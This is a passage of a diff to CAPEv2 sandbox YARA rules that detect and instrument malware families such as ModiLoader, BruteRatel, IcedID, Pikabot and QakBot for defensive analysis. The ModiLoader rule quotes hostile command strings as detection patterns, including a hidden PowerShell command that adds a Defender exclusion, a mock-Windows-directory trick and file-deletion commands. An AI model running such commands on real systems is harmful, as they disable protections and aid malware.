-		logic_hash = "de8ed0e98948cfadfd579e334fd9ce9f777ddbd988de897529ba71cb5eb2d396"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/ModiLoader.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "1f0cbf841a6bc18d632e0bc3c591266e77c99a7717a15fc4b84d3e936605761f"
+		logic_hash = "9e64e0c40192cc832a1ffa7b3ac65a704596af82515d03706cd7aa1f4498f32f"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$keyiv0+8,action0=dump:ecx::64,hc0=1,bp1=$keyiv0*-4,action1=dump:ecx::32,hc1=1,count=0"
+		tags = "FILE"
+		cape_options = "exclude-apis=NtAllocateVirtualMemory:NtProtectVirtualMemory"
 
 	strings:
-		$keyiv0 = {48 8B 8C 24 [4] E8 [3] 00 4? 89 84 24 [4] 4? 8B 84 24 [4] 4? 89 84 24 [4] 4? 8B 8C 24 [4] E8 [3] 00}
-		$keyiv1 = {48 89 84 24 [4] 4? 8B 84 24 [4] 4? 8B 94 24 [4] 4? 8D 8C 24 [4] E8 [3] FF}
-		$keyiv2 = {48 63 84 24 [4] 4? 8B C0 4? 8B 94 24 [4] 4? 8D 8C 24 [4] E8 [3] FF 4? 8B 84 24}
+		$epilog1 = {81 C2 A1 03 00 00 87 D1 29 D3 33 C0 5A 59 59 64 89 10 68}
+		$epilog2 = {6A 00 6A 01 8B 45 ?? 50 FF 55 ?? 33 C0 5A 59 59 64 89 10 68}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule CAPE_Nitrogenloaderbypass
+rule CAPE_Modiloaderold : FILE
 {
 	meta:
-		description = "Nitrogen Loader Exit Bypass"
-		author = "enzok"
-		id = "397b0b79-d569-5a71-bcac-ce0d64f706e6"
-		date = "2024-10-29"
-		modified = "2025-07-23"
+		description = "ModiLoader detonation shim"
+		author = "ditekSHen"
+		id = "2b3fd8ec-b672-574b-9b50-1a9ca9f43299"
+		date = "2023-10-19"
+		modified = "2025-01-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/NitrogenLoader.yar#L29-L41"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "3a034d3ddd18723ea1f91814c8c2a2c47a749dfd1496a5d4777d8ff8bfab3457"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/ModiLoader.yar#L15-L53"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "fc006377e6d41515503b0b234ff87f59d930a7d9f8b32d2e072de79b9c52ddc4"
+		score = 75
+		quality = 66
+		tags = "FILE"
+		cape_options = "ntdll-protect=0"
+
+	strings:
+		$x1 = "*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@" fullword wide
+		$x2 = "dntdll" fullword wide
+		$x3 = "USERPROFILE" fullword wide
+		$s1 = "%s, ProgID: \"%s\"" ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
+		$s3 = "responsetext" ascii
+		$s4 = "C:\\Users\\Public\\" ascii
+		$s5 = "[InternetShortcut]" fullword ascii
+		$c1 = "start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command \"Add-MpPreference -ExclusionPath 'C:\\Users'\" & exit" ascii nocase
+		$c2 = "mkdir \"\\\\?\\C:\\Windows \"" ascii nocase
+		$c3 = "mkdir \"\\\\?\\C:\\Windows \\System32\"" ascii nocase
+		$c4 = "ECHO F|xcopy \"" ascii nocase
+		$c5 = "\"C:\\Windows \\System32\" /K /D /H /Y" ascii nocase
+		$c6 = "ping 127.0.0.1 -n 6 > nul" ascii nocase
+		$c7 = "del /q \"C:\\Windows \\System32\\*\"" ascii nocase
+		$c8 = "rmdir \"C:\\Windows \\System32\"" ascii nocase
+		$c9 = "rmdir \"C:\\Windows \"" ascii nocase
+		$g1 = "powershell" ascii nocase
+		$g2 = "mkdir \"\\\\?\\C:\\" ascii nocase
+		$g3 = "\" /K /D /H /Y" ascii nocase
+		$g4 = "ping 127.0.0.1 -n" ascii nocase
+		$g5 = "del /q \"" ascii nocase
+		$g6 = "rmdir \"" ascii nocase
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and ( all of ( $g* ) or ( 2 of ( $s* ) and 2 of ( $c* ) ) ) ) or ( all of ( $s* ) and ( 2 of ( $c* ) or all of ( $g* ) ) ) or ( 4 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) or ( all of ( $g* ) and 4 of ( $c* ) ) or 13 of them )
+}
+rule CAPE_Bruteratelsyscall
+{
+	meta:
+		description = "BruteRatel Syscall Bypass"
+		author = "kevoreilly"
+		id = "0ddc3e0a-c4ca-5342-b029-107ce1f2751e"
+		date = "2024-07-11"
+		modified = "2024-07-22"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/BruteRatel.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "5ed054b3cd5d2659c250945d55d6adac90945963c34ad2af0f8d7436141e86b6"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp2=$exit-2,action2=jmp,count=0"
+		cape_options = "sysbp=$syscall1+6,sysbp=$syscall2+8"
 
 	strings:
-		$string1 = "LoadResource"
-		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
-		$exit = {33 C9 E8 [4] E8 [4] 48 8D 84 24 [4] 48 89 44 24 ?? 4? B? E4 00 00 00 4? 8B 05 [4] B? 03 00 00 00 48 8D}
+		$syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)}
+		$syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24}
 
 	condition:
 		all of them
 }
-rule CAPE_Nitrogenloaderconfig
+rule CAPE_Bruteratelpacker
 {
 	meta:
-		description = "NitrogenLoader Config Extraction"
-		author = "enzok"
-		id = "0c8d0655-0592-52b5-b51d-3acdb15a4864"
-		date = "2024-10-29"
-		modified = "2025-07-23"
+		description = "BruteRatel Outer Encryption Layer"
+		author = "kevoreilly"
+		id = "631083be-7058-590a-a394-984545f42ad7"
+		date = "2024-07-11"
+		modified = "2024-07-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/NitrogenLoader.yar#L43-L66"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "06d49ebf3f67476c83a77734dff0245a51027a35d92e5af07bb9146db5b156ca"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/BruteRatel.yar#L14-L26"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "2ccb17efe378d034df34d20d7580c58171d0fd11c18fef6c9a23f1ba238514e6"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$decrypt1*+1,bp1=$key*,hc0=1,count=0,action0=string:rcx,action1=string:rdx,typestring=NitrogenLoader Config"
+		cape_options = "bp1=$outer*,action1=scan,count=0"
 
 	strings:
-		$decrypt1 = {48 63 4? 24 ?? 33 D2 48 [0-3] F7 B4 24 [4] 48 8B C2 48 8B 8C 24 [4] 0F BE 04 01}
-		$decrypt2 = {8B ?? 24 [1-4] 33 C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
-		$decrypt3 = {8B 8C 24 ?? ?? ?? ?? 2B C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
-		$key = {74 ?? E8 [4] 85 C0 75 ?? 4? 8B 0D [3] 00 4? 8D 15 [3] 00 E8}
-		$taskman_1 = {E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [4] B9 6B 00 00 00 88 84 24 [4] E8 [3] FF}
-		$taskman_2 = {B9 4D 00 00 00 88 84 24 [4] E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 6E 00 00 00 88 84 24 [4] E8 [3] FF}
-		$taskman_3 = {B9 61 00 00 00 88 84 24 [4] E8 [4] B9 67 00 00 00 88 84 24 [4] E8 [4] B9 65 00 00 00 88 84 24 [4] E8 [3] FF}
-		$taskman_4 = {B9 72 00 00 00 88 84 24 [4] E8 [4] 31 C9 88 84 24 [4] E8 [3] FF}
-		$installers_1 = {B9 49 00 00 00 E8 [4] B9 6E 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [3] FF}
-		$installers_2 = {B9 74 00 00 00 88 84 24 [4] E8 [4] B9 61 00 00 00 88 84 24 [4] E8 [4] B9 6C 00 00 00 88 84 24 [4] E8 [3] FF}
-		$installers_3 = {B9 6C 00 00 00 88 84 24 [4] E8 [4] B9 65 00 00 00 88 84 24 [4] E8 [3] FF}
-		$installers_4 = {B9 72 00 00 00 88 84 24 [4] E8 [4] B9 73 00 00 00 88 84 24 [4] E8 [3] FF}
-		$rc4decrypt_1 = {48 89 ?? 4? 89 ?? E8 [4] 4? 8B ?? 24 [1-4] 4? 89 ?? 4? 89 ?? 4? 89 C1 [0-1] 89 ?? E8 [4] 4? 89}
-		$rc4decrypt_2 = {E8 [4] 8B ?? 24 [1-4] 4? 89 ?? 48 89 ?? 4? 89 C1 E8 [3] FF}
+		$outer = {83 45 F8 01 81 7D F8 FF 00 00 00 7E ?? 83 45 FC 01 8B 45 FC 3B 45 ?? 7E ?? 48}
+		$inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF}
+		$date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00}
 
 	condition:
-		any of ( $decrypt* ) or ( $key and ( 3 of ( $taskman_* ) or 3 of ( $installers* ) and 1 of ( $rc4decrypt_* ) ) )
+		($outer ) and not ( $inner ) and not ( $date )
 }
-rule CAPE_Agentteslav4Jit
+rule CAPE_Bruterateldate
 {
 	meta:
-		description = "AgentTesla V4 JIT native config extractor"
+		description = "BruteRatel Date Check Bypass"
 		author = "kevoreilly"
-		id = "a87dca44-4974-543c-9565-487ed99be2a6"
-		date = "2023-09-13"
-		modified = "2024-02-27"
+		id = "94dd5cf3-ed59-51d6-92c8-aee73fe2926b"
+		date = "2024-07-11"
+		modified = "2024-07-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/AgentTesla.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "8f7144d2a989ce8d291af926b292f5f0f7772e707b0e49797eba13ecf91b90bc"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/BruteRatel.yar#L28-L39"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "88589b2d08aea03565668ff1b9af20b6fe11cda50d867c60db7cb4d1826b0fd7"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$decode1+8,count=0,action0=string:ecx,typestring=AgentTesla Strings,no-logs=2"
-		packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c"
+		cape_options = "clear,bp1=$inner*,action1=scan,bp2=$date+6,action2=skip,count=0"
 
 	strings:
-		$decode1 = {8B 01 8B 40 3C FF 50 10 8B C8 E8 [4] 89 45 CC B8 1A 00 00 00}
-		$decode2 = {83 F8 18 75 2? 8B [2-5] D1 F8}
-		$decode3 = {8D 4C 0? 08 0F B6 01 [0-3] 0F B6 5? 04 33 C2 88 01 B8 19 00 00 00}
+		$inner = {88 E3 32 1C 0E 88 5C 15 00 48 8D 49 01 48 8D 52 01 38 C1 76 ?? 48 01 CE EB ?? FF}
+		$date = {48 8B 17 48 85 D2 0F 85 [2] 00 00 8B 47 08 85 C0 0F 85 [2] 00 00}
 
 	condition:
-		2 of them
+		any of them
 }
-rule CAPE_Agentteslav3Jit
+rule CAPE_Bruteratelconfig
 {
 	meta:
-		description = "AgentTesla V3 JIT native string decryption"
-		author = "ClaudioWayne"
-		id = "590c5058-c1db-5366-8db5-57449a178999"
-		date = "2023-09-13"
-		modified = "2024-02-27"
+		description = "BruteRatel Config Extraction"
+		author = "kevoreilly"
+		id = "5ae680b0-5ad2-5e82-87f8-b0af4fec18de"
+		date = "2024-07-11"
+		modified = "2024-07-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/AgentTesla.yar#L16-L26"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "62a49cf4295df637f96ba7c127cfc4aeb9af2fcced497fdf34d726a062edc1ec"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/BruteRatel.yar#L41-L51"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "b1815aafec940ab6c8daafc68ccf294845221ada260de5209dcb7e49ccd061c7"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "bp0=$decode+20,count=0,action0=string:eax+8,typestring=AgentTesla Strings,no-logs=2"
+		cape_options = "clear,br1=$decode,count=0,action0=string:eax,typestring=BruteRatel Config"
 
 	strings:
-		$decode = {8B C8 57 FF 75 08 8B [5] 8B 01 8B 40 3C FF [2] 8B F0 B8 03 00 00 00}
+		$decode = {55 57 56 53 48 83 EC ?? 31 C0 48 89 CB 48 89 D7 44 89 C6 44 89 CD 44 39 01 77 ?? 41 8D 48 01 E8 [4] 31 C9}
 
 	condition:
 		all of them
 }
-rule CAPE_Icedidsyscallwritemem : FILE
+rule CAPE_Hijackloaderstub
 {
 	meta:
-		description = "IcedID 'syscall' packer bypass - direct write variant"
+		description = "HijackLoader Stub Executable"
 		author = "kevoreilly"
-		id = "67935058-4191-587f-ad19-497defd0eef1"
-		date = "2021-03-30"
-		modified = "2023-11-28"
+		id = "53363a3a-7f2a-52a6-8c0a-5f03fd121f70"
+		date = "2026-01-26"
+		modified = "2026-01-26"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/IcedID.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6b068106b038e9efeb9057cadf314d400c1ada1a1cc70336d3272da3a212c993"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/HijackLoader.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "686a19a416b94f6ccdd1891ff027452c84b2171ee4268ff971f490e18948a6f5"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$tokencheck+9,action0=jmp,count=0"
-		packed = "28075ecae5e224c06e250f2c949c826b81844bca421e9158a7a9e965a29ef894"
-		packed = "045dff9f14a03225df55997cb2ca74ff60ecaf317b9e033ea93386785db84161"
+		tags = ""
+		cape_options = "dump-limit=0,dump"
 
 	strings:
-		$tokencheck = {39 5D ?? 75 06 83 7D ?? 03 74 05 BB 01 00 00 00 41 89 1C ?? 48 8B 4D ?? 41 FF D?}
+		$stub1 = {50 83 C0 10 50 56 8D 85 [4] 50 E8 [4] 83 C7 30 8D 85 [4] 3B F8 74 08 8B 35 [4] EB D3}
+		$stub2 = {33 C5 89 45 ?? (C6 45 ?? 00|C7 45 ?? 61 7A 2D 2D) 8D 45 ?? FF 75 ?? C7 45 ?? 30 39 41 5A 50 8D 45 (??|?? C7 45 ?? 61 7A 2D 2D) 50 E8}
+		$app = "\\app-" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		2 of them
 }
-rule CAPE_Icedidhook
+rule CAPE_Slowloader
 {
 	meta:
-		description = "IcedID hook fix"
+		description = "SlowLoader detonation aide for slow cpus (thread race)"
 		author = "kevoreilly"
-		id = "011c9cb7-8080-5f8a-9dca-6397e9bf7bf6"
-		date = "2021-03-30"
-		modified = "2023-11-28"
+		id = "05724bf4-b767-542d-a2dd-a9ae3e5ea5cc"
+		date = "2024-09-23"
+		modified = "2024-09-23"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/IcedID.yar#L15-L25"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "fd62e0ed6f2a18472fa9336daee0e8a3a55e21779a8385394e85f96da928e24f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/SlowLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "f07528c646ebd980a5e843caa4a4715e31b22c3cd091576600e9fe45d7fc2fe4"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "ntdll-protect=0"
+		cape_options = "break-on-return=CreateProcessA,action0=sleep:1000,count=0"
+		packed = "f6eeb73ffb3e6d6cc48f74344cb590614db7e3116ba00a52aefd7dff468a60a5"
 
 	strings:
-		$hook = {C6 06 E9 83 E8 05 89 46 01 8D 45 ?? 50 FF 75 ?? 6A 05 56 6A FF E8 2D FA FF FF}
+		$code = {0F B6 44 07 08 0F B6 54 1F 08 03 C2 25 FF 00 00 80 79 07 48 0D 00 FF FF FF 40 89 45 ?? 6A 00}
 
 	condition:
 		any of them
 }
-rule CAPE_Icedidpackera : FILE
+rule CAPE_Amatera : FILE
 {
 	meta:
-		description = "IcedID export selection"
+		description = "Amatera syscall capture"
 		author = "kevoreilly"
-		id = "d793d8a1-0e17-56ad-933c-470e2290867b"
-		date = "2021-03-30"
-		modified = "2023-11-28"
+		id = "0d58a054-8636-58d8-99b9-26560aa6c187"
+		date = "2025-06-25"
+		modified = "2025-06-25"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/IcedID.yar#L27-L40"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe"
-		logic_hash = "aa0681e7794546355e6d61f739c49035a493cdfca7e666531d74e3835ec44408"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Amatera.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af"
+		logic_hash = "1c02f04846568b85acbd4101b2e944dc824179f7cff1bceaec1c657939b610d5"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_options = "sysbp=$sysenter"
 
 	strings:
-		$init = "init"
-		$export = {48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 81 EC [2] 00 00 41 8B E9 49 8B F0 48 8B FA 48 8B D9}
-		$alloc = {8B 50 50 33 C9 44 8D 49 40 41 B8 00 30 00 00 FF 15 [4] 48 89 44 24 28 [0-3] 48 89 84 24 ?? 00 00 00 E9}
+		$sysenter = {64 FF 15 C0 00 00 00 C3}
+		$harness = {0F B7 55 EC 52 E8 [4] 83 C4 04 C7 45 F0 [4] 8B 45 ?? 50 [0-40] FF 55 F0 83 C4 ?? 8B E5 5D C3}
+		$socket = {66 89 [2] 6A 00 6A ?? 8D [3] 68 (03|07) 20 01 00 8B 4D F8 E8 [4] 0F B6 (C0|C8) 85 (C0|C9) 75 04 32 C0 EB}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Icedidpackerb : FILE
+rule CAPE_Pikahook : FILE
 {
 	meta:
-		description = "IcedID export selection"
+		description = "Pikabot anti-hook bypass"
 		author = "kevoreilly"
-		id = "6bd0e64d-e60e-5cd2-af79-946a7f6dc9f5"
-		date = "2021-03-30"
-		modified = "2023-11-28"
+		id = "e1b7a807-135f-52d7-bc36-c0419e82b424"
+		date = "2024-03-07"
+		modified = "2024-03-12"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/IcedID.yar#L42-L56"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "6517ef2c579002ec62ddeb01a3175917c75d79ceca355c415a4462922c715cb6"
-		logic_hash = "fde1e2c0124d180b2fa3d0675b35e8d78fdd7b06cd27e9228c148aa29ce30ee7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Pikabot.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "2a50a5f2d905122a5b7ac8ca3666b47caa24d325e246841129e53807daf2a1dd"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_options = "clear,sysbp=$indirect+40,sysbpmode=1,force-sleepskip=1"
+		packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9"
 
 	strings:
-		$init = "init"
-		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 4C 24 08 41 55 41 56 41 57 48 81 EC ?? 00 00 00 B9 [2] 00 00 4C 8B EA E8}
-		$loop = {8B C2 48 8D 49 01 83 E0 07 FF C2 0F B6 44 30 ?? 30 41 FF 3B D5 72}
+		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1 [4] FF 15}
+		$sysenter1 = {89 44 24 08 8D 85 20 FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8}
+		$sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Icedidpackerc : FILE
+rule CAPE_Pikexport : FILE
 {
 	meta:
-		description = "IcedID export selection"
+		description = "Pikabot export selection"
 		author = "kevoreilly"
-		id = "fddfd0d2-1bc0-56bb-b983-5850e17a3d0f"
-		date = "2021-03-30"
-		modified = "2023-11-28"
+		id = "7d2432f2-90ae-5ad0-b579-5789a1c14a08"
+		date = "2024-03-07"
+		modified = "2024-03-12"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/IcedID.yar#L58-L71"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "c06805b6efd482c1a671ec60c1469e47772c8937ec0496f74e987276fa9020a5"
-		hash = "265c1857ac7c20432f36e3967511f1be0b84b1c52e4867889e367c0b5828a844"
-		logic_hash = "f1e75e380ab0947fdfda012b7a5077a1c2ef51163239846ab2dc29cac95ba166"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Pikabot.yar#L16-L28"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "238dcc5611ed9066b63d2d0109c9b623f54f8d7b61d5f9de59694cfc60a4e646"
+		logic_hash = "33f58703a0e40c2361343dbdcc17111aafbf5cc912393edda79005c6ec566f42"
 		score = 75
 		quality = 70
 		tags = "FILE"
 		cape_options = "export=$export"
 
 	strings:
-		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 3A ED 74}
-		$alloc = {41 B8 00 10 00 00 8B D0 33 C9 66 3B ?? (74|0F 84)}
+		$export = {55 8B EC 83 EC ?? C6 45 [2] C6 45 [2] C6 45 [2] C6 45 [2] C6 45}
+		$pe = {B8 08 00 00 00 6B C8 00 8B 55 ?? 8B 45 ?? 03 44 0A 78 89 45 ?? 8B 4D ?? 8B 51 18 89 55 E8 C7 45 F8 00 00 00 00}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Icedidpackerd : FILE
+rule CAPE_Qakbot5 : FILE
 {
 	meta:
-		description = "IcedID export selection"
+		description = "QakBot WMI anti-anti-vm"
 		author = "kevoreilly"
-		id = "df0ca4bd-1ea6-57ef-b85a-7ed0e2a20831"
-		date = "2021-03-30"
-		modified = "2023-11-28"
+		id = "d287b043-15df-5865-ad4c-9eb64ceec04c"
+		date = "2022-03-16"
+		modified = "2024-02-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/IcedID.yar#L73-L86"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "7b226f8cc05fa7d846c52eb0ec386ab37f9bae04372372509daa6bacc9f885d8"
-		logic_hash = "6685e0246f5a11ce0ca33447837de06506b447a5f8591423e2b76f2ab0274dc7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/QakBot.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "303ea2d8d1a7f0fd0ca5508dae2c1b83c03b1e3e975760f15d36d93bcc152767"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export"
+		cape_options = "bp0=$loop+35,action0=skip,count=0"
+		packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2"
 
 	strings:
-		$init = "init"
-		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 66 3B ED 74}
-		$load = {41 B8 00 80 00 00 33 D2 48 8B 4C [2] EB ?? B9 69 04 00 00 E8 [4] 48 89 84 [2] 00 00 00 66 3B ED 74}
+		$loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E}
+		$conf = {0F B7 1D [4] B9 [2] 00 00 E8 [4] 8B D3 48 89 45 ?? 45 33 C9 48 8D 0D [4] 4C 8B C0 48 8B F8 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Icedsleep : FILE
+rule CAPE_Qakbot4 : FILE
 {
 	meta:
-		description = "IcedID sleep bypass"
+		description = "QakBot Config Extraction"
 		author = "kevoreilly"
-		id = "d6bd708b-47bc-5620-b40e-8fe5f1a67ba4"
-		date = "2021-03-30"
-		modified = "2023-11-28"
+		id = "401184cf-bbd7-5afe-9589-470f54721af1"
+		date = "2022-03-16"
+		modified = "2024-02-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/IcedID.yar#L88-L99"
